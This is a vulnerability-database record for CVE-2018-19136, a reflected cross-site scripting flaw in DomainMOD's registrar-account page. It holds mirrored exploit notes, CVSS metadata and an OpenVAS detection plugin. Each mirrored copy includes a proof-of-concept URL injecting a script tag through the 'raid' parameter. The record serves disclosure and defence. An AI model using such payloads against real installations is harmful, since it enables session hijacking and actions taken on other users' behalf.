ID PACKETSTORM:150386
Type packetstorm
Reporter Dawood Ansar
Modified 2018-11-16T00:00:00
Description
`# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-09
# Exploit Author: Dawood Ansar
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19136
# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01i1/4https://github.com/domainmod/domainmod/issues/79i1/4
# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php
# page and inject a javascript XSS payload in raid parameter
# POC:
http://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&del=1
`
{"id": "PACKETSTORM:150386", "type": "packetstorm", "bulletinFamily": "exploit", "title": "DomainMOD 4.11.01 Cross Site Scripting", "description": "", "published": "2018-11-16T00:00:00", "modified": "2018-11-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/150386/DomainMOD-4.11.01-Cross-Site-Scripting.html", "reporter": "Dawood Ansar", "references": [], "cvelist": ["CVE-2018-19136"], "lastseen": "2018-11-17T02:20:04", "viewCount": 282, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-19136"]}, {"type": "exploitdb", "idList": ["EDB-ID:45883"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:98B3D12CA3D35A610327A45E55849405"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113327"]}, {"type": "zdt", "idList": ["1337DAY-ID-31647"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-19136"]}, {"type": "exploitdb", "idList": ["EDB-ID:45883"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:98B3D12CA3D35A610327A45E55849405"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113327"]}, {"type": "zdt", "idList": ["1337DAY-ID-31647"]}]}, "exploitation": null, "vulnersScore": 4.3}, "sourceHref": "https://packetstormsecurity.com/files/download/150386/domainmod41101-xss.txt", "sourceData": "`# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting \n# Date: 2018-11-09 \n# Exploit Author: Dawood Ansar \n# Vendor Homepage: domainmod (https://domainmod.org/) \n# Software Link: domainmod (https://github.com/domainmod/domainmod) \n# Version: v4.09.03 to v4.11.01 \n# CVE : CVE-2018-19136 \n \n# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application \n# versions from v4.09.03 to v4.11.01i1/4https://github.com/domainmod/domainmod/issues/79i1/4 \n# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php \n# page and inject a javascript XSS payload in raid parameter \n \n# POC: \nhttp://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(\"XSS\")%3C%2Fscript%3E&del=1 \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645388527}}
{"zdt": [{"lastseen": "2018-11-19T19:12:48", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-11-16T00:00:00", "type": "zdt", "title": "DomainMOD 4.11.01 - Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-19136"], "modified": "2018-11-16T00:00:00", "id": "1337DAY-ID-31647", "href": "https://0day.today/exploit/description/31647", "sourceData": "# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting\r\n# Exploit Author: Dawood Ansar\r\n# Vendor Homepage: domainmod (https://domainmod.org/)\r\n# Software Link: domainmod (https://github.com/domainmod/domainmod)\r\n# Version: v4.09.03 to v4.11.01\r\n# CVE : CVE-2018-19136\r\n \r\n# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application \r\n# versions from v4.09.03 to v4.11.01\uff08https://github.com/domainmod/domainmod/issues/79\uff09\r\n# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php \r\n# page and inject a javascript XSS payload in raid parameter\r\n \r\n# POC: \r\nhttp://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(\"XSS\")%3C%2Fscript%3E&del=1\n\n# 0day.today [2018-11-19] #", "sourceHref": "https://0day.today/exploit/31647", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:12", "description": "\nDomainMOD 4.11.01 - raid Cross-Site Scripting", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-11-16T00:00:00", "title": "DomainMOD 4.11.01 - raid Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19136"], "modified": "2018-11-16T00:00:00", "id": "EXPLOITPACK:98B3D12CA3D35A610327A45E55849405", "href": "", "sourceData": "# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting\n# Date: 2018-11-09\n# Exploit Author: Dawood Ansar\n# Vendor Homepage: domainmod (https://domainmod.org/)\n# Software Link: domainmod (https://github.com/domainmod/domainmod)\n# Version: v4.09.03 to v4.11.01\n# CVE : CVE-2018-19136\n\n# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application \n# versions from v4.09.03 to v4.11.01\uff08https://github.com/domainmod/domainmod/issues/79\uff09\n# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php \n# page and inject a javascript XSS payload in raid parameter\n\n# POC: \nhttp://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(\"XSS\")%3C%2Fscript%3E&del=1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T15:12:39", "description": "DomainMOD through 4.11.01 has XSS via the assets/edit/registrar-account.php raid parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-11-09T19:29:00", "type": "cve", "title": "CVE-2018-19136", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19136"], "modified": "2018-12-11T19:52:00", "cpe": ["cpe:/a:domainmod:domainmod:4.11.01"], "id": "CVE-2018-19136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19136", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:domainmod:domainmod:4.11.01:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-01-13T05:34:23", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-11-16T00:00:00", "type": "exploitdb", "title": "DomainMOD 4.11.01 - 'raid' Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19136", "2018-19136"], "modified": "2018-11-16T00:00:00", "id": "EDB-ID:45883", "href": "https://www.exploit-db.com/exploits/45883", "sourceData": "# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting\r\n# Date: 2018-11-09\r\n# Exploit Author: Dawood Ansar\r\n# Vendor Homepage: domainmod (https://domainmod.org/)\r\n# Software Link: domainmod (https://github.com/domainmod/domainmod)\r\n# Version: v4.09.03 to v4.11.01\r\n# CVE : CVE-2018-19136\r\n\r\n# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application \r\n# versions from v4.09.03 to v4.11.01\uff08https://github.com/domainmod/domainmod/issues/79\uff09\r\n# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php \r\n# page and inject a javascript XSS payload in raid parameter\r\n\r\n# POC: \r\nhttp://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(\"XSS\")%3C%2Fscript%3E&del=1", "sourceHref": "https://www.exploit-db.com/download/45883", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-10-09T14:28:47", "description": "DomainMOD is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-01-22T00:00:00", "type": "openvas", "title": "DomainMOD < 4.12.0 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-19749", "CVE-2018-19913", "CVE-2018-20010", "CVE-2018-19752", "CVE-2018-19136", "CVE-2018-19914", "CVE-2018-20011", "CVE-2018-19750", "CVE-2019-1010096", "CVE-2018-19892", "CVE-2018-19137", "CVE-2018-20009", "CVE-2018-11558", "CVE-2018-19751", "CVE-2019-1010095", "CVE-2018-19915", "CVE-2019-1010094", "CVE-2018-11559"], "modified": "2019-10-07T00:00:00", "id": "OPENVAS:1361412562310113327", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113327", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113327\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-22 15:55:07 +0200 (Tue, 22 Jan 2019)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-11558\", \"CVE-2018-11559\", \"CVE-2018-19136\", \"CVE-2018-19137\", \"CVE-2018-19749\", \"CVE-2018-19750\",\n \"CVE-2018-19751\", \"CVE-2018-19752\", \"CVE-2018-19892\", \"CVE-2018-19913\", \"CVE-2018-19914\",\n \"CVE-2018-19915\", \"CVE-2018-20009\", \"CVE-2018-20010\", \"CVE-2018-20011\", \"CVE-2019-1010094\",\n \"CVE-2019-1010095\", \"CVE-2019-1010096\");\n\n script_name(\"DomainMOD < 4.12.0 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_domainmod_http_detect.nasl\");\n script_mandatory_keys(\"domainmod/detected\");\n\n script_tag(name:\"summary\", value:\"DomainMOD is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - Stored XSS in the '/settings/profile/index.php' new_first_name parameter\n\n - Stored XSS in the '/settings/profile/index.php' new_last_name parameter\n\n - XSS via the admin/dw/add-server.php DisplayName, HostName, or UserName field\n\n - XSS via the assets/add/account-owner.php Owner name field\n\n - XSS via the admin/domain-fields/ notes field in an Add Custom Field action for Custom Domain Fields\n\n - XSS via the admin/ssl-fields/add.php notes field for Custom SSL Fields\n\n - XSS via the assets/add/registrar.php notes field for the Registrar\n\n - XSS via the assets/edit/registrar-account.php raid parameter\n\n - XSS via the assets/edit/ip-address.php ipid parameter\n\n - XSS via the assets/add/ssl-provider.php SSL Provider Name or SSL Provider URL field\n\n - XSS via the assets/add/ssl-provider-account.php username field\n\n - XSS via the assets/add/registrar-accounts.php UserName, Reseller ID, or notes field\n\n - XSS via the assets/add/dns.php Profile Name or notes field\n\n - XSS via the assets/edit/host.php Web Host Name or Web Host URL field\n\n - CSRF in /settings/password that allows an attacker to change the admin password\n\n - CSRF in /admin/users/add.php allows an attacker to add an administrator account\n\n - CSRF in /admin/users/edit.php?uid=2 allows an attacker to change the read-only user to admin\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to craft a malicious\n link containing arbitrary JavaScript or HTML or perform actions in the context of another user.\");\n script_tag(name:\"affected\", value:\"DomainMOD prior to version 4.12.0.\");\n script_tag(name:\"solution\", value:\"Update to DomainMOD version 4.12.0 or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/65\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/66\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/79\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/81\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/82\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/83\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/84\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/86\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/87\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/88\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/79#issuecomment-460035220\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:domainmod:domainmod\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less( version: version, test_version: \"4.12.0\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"4.12.0\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
